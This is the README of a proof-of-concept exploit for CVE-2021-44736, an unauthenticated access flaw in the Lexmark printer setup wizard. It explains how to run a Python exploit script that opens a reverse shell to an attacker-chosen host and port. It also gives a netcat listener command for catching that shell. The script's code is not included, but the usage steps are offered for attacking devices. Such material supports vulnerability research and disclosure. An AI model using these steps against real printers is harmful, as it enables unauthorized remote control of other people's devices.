## https://sploitus.com/exploit?id=DBCA9A54-C355-5FA7-AE73-C601DAC46702
# CVE-2021-44736 PoC
The initial admin account setup wizard on Lexmark devices allow unauthenticated access to the “out of service erase” feature.
Exploit based on the following research https://www.crowdstrike.com/blog/how-to-compromise-a-printer-in-3-simple-steps/.
## Using
To run the exploit pass 2 arguments:
- rhost - IP-address of the interface for reverse-shell connection
- rport - port number for reverse-shell connection
```
python3 cve-2021-44736.py -r <rhost> -p <rport>
```
![](./exploitation_example.png)
To receive a reverse-shell connection start listener on the specified lhost and lport, for example using `netcat`:
```
nc -nvlp 8080
```
![](./exploitation_result.png)